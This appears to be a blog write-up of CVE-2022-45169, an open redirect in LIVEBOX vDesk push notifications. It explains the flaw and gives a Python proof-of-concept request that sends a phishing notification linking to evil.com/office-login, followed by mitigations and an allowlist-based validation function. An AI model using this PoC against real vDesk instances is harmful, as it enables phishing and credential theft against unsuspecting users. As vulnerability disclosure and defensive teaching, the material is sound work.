CVE-2022-45169 - Stealing Clicks with Open Redirect & Push Notification Exploit in LIVEBOX vDesk

In late 2022, security researchers discovered a surprisingly simple but dangerous flaw in the popular enterprise software, LIVEBOX Collaboration vDesk (up to version v031). This post will dig into CVE-2022-45169: an Open Redirect combined with a Push Notification issue, explaining how it works, why it matters, and even providing code samples to demonstrate the exploit.

What is LIVEBOX vDesk?

LIVEBOX vDesk is an all-in-one collaboration platform used by companies to manage projects, chat, assign tasks, and send notifications. As with any business tool handling sensitive data and high user interaction, security is not optional.

What’s the Issue (In Simple Terms)?

CVE-2022-45169 is a vulnerability where a logged-in user can craft a malicious push notification to *any* other user. This message can secretly include a link to a site controlled by an attacker. The targeted user receives a normal-looking notification, and, if they click, they are silently redirected to a dangerous website — without suspecting foul play.

It's dangerous because it combines two weaknesses:

1. Open Redirect: The URL redirection isn’t properly validated, so attackers can point it anywhere.
2. Invisible Link: The notification system lets attackers hide the malicious URL inside clickable text or even make it invisible.

The flaw exists at the endpoint:

POST /api/v1/notification/createnotification

The request body looks something like this:

{
  "to_user": "victim_username",
  "title": "Urgent: Action Needed",
  "message": "Please review the attached report.",
  "link": "https://evil.com/phishing"
}

The link parameter isn't validated: the server stores whatever value it receives and renders it in the notification as a clickable link.

How the Exploit Works

Exploiter Prerequisites: a valid account on the target vDesk instance, since the request is sent with the attacker's own credentials.

Steps

1. Craft a push notification. The attacker prepares a message with a hidden or friendly-sounding title (or even a blank space).
2. Insert a phishing/malicious URL in the link field (can also use shortened or obfuscated links).
3. Send the POST request to /api/v1/notification/createnotification using their own credentials.
4. Victim receives notification. When they click it, they are redirected (possibly invisibly or silently) to the destination — this might auto-download malware or ask for sensitive login info.

Proof-of-Concept (PoC) Code

Here’s a real-world simulation using Python and requests. You’ll need your own authentication token (auth_token), which you can get by logging in normally.

import requests

# Target instance (placeholder host) and the vulnerable endpoint.
url = "https://vdesk.example.com/api/v1/notification/createnotification"

# Any valid vDesk session token works; obtain it by logging in normally.
headers = {
    "Authorization": "Bearer YOUR_AUTH_TOKEN",
    "Content-Type": "application/json"
}

# The "link" value is stored and rendered without any validation.
data = {
    "to_user": "john.doe",
    "title": "Quarterly Performance Review",
    "message": "Please download the report.",
    "link": "https://evil.com/office-login"
}

r = requests.post(url, headers=headers, json=data)
print(f"Status: {r.status_code}, Response: {r.text}")

What happens?

- John Doe gets a notification titled “Quarterly Performance Review.”
- He clicks, and is secretly sent to https://evil.com/office-login — a site masquerading as the company’s login page.

Mitigations

- Patch: Upgrade to a LIVEBOX vDesk version in which this issue is fixed (ask the vendor for details).
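As an added example (not LIVEBOX's own code and not part of the original post), this is the kind of server-side check the createnotification endpoint should apply to the link parameter before storing it: only absolute http(s) URLs whose host is on an allowlist are accepted, and blank titles (the "invisible" notification trick) are refused. The host names in ALLOWED_LINK_HOSTS and the field names are assumptions based on the request body shown above.

```python
from urllib.parse import urlsplit

# Constructed allowlist: in a real deployment this is the set of host names
# the vDesk instance itself is served from (the value here is an assumption).
ALLOWED_LINK_HOSTS = {"vdesk.example.com"}


def is_safe_notification_link(link: str) -> bool:
    """Accept only absolute http(s) URLs whose host is on the allowlist.

    Rejects off-site hosts (the open redirect itself), scheme-relative
    "//evil.com" links, javascript:/data: schemes, and userinfo tricks
    such as https://vdesk.example.com@evil.com/.
    """
    if not isinstance(link, str) or not link or len(link) > 2048:
        return False
    # Whitespace and control characters can confuse browser URL parsers.
    if any(ord(c) <= 0x20 or ord(c) == 0x7F for c in link):
        return False
    try:
        parts = urlsplit(link)
    except ValueError:  # e.g. malformed IPv6 literal
        return False
    if parts.scheme not in ("http", "https"):  # urlsplit lower-cases the scheme
        return False
    if parts.username is not None or parts.password is not None:
        return False
    host = parts.hostname  # lower-cased, port and brackets stripped
    return host is not None and host in ALLOWED_LINK_HOSTS


def validate_notification(data: dict) -> tuple[bool, str]:
    """Server-side check for a createnotification body; returns (ok, reason)."""
    for field in ("to_user", "title", "message"):
        if not isinstance(data.get(field), str) or not data[field].strip():
            return False, f"missing or blank field: {field}"
    link = data.get("link")
    if link is None:  # link is optional; a notification without one is fine
        return True, "ok"
    if not is_safe_notification_link(link):
        return False, "link must be an absolute http(s) URL on an allowed host"
    return True, "ok"
```

Rejecting the request is preferable to "cleaning" the URL, because a rewritten link still trains users to click whatever the notification shows.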

References & More Info

- Official CVE entry: NVD - CVE-2022-45169
- LIVEBOX vendor: https://www.livebox.online/
- OWASP on Open Redirect
- Exploit-DB Listing (if available)

Summary

CVE-2022-45169 is a classic example of “it’s not just code — it’s people.” By abusing an Open Redirect inside system notifications, attackers can leap past technical defenses and target users where they trust the most: their own company’s tools.

Key lesson: Always validate user input, especially anything that can generate URLs or links visible to others. And stay current with security patches!


*Stay safe, and don’t trust every notification you receive — even if it looks official.*

Timeline

Published on: 02/21/2024 16:15:49 UTC
Last modified on: 03/19/2024 16:48:23 UTC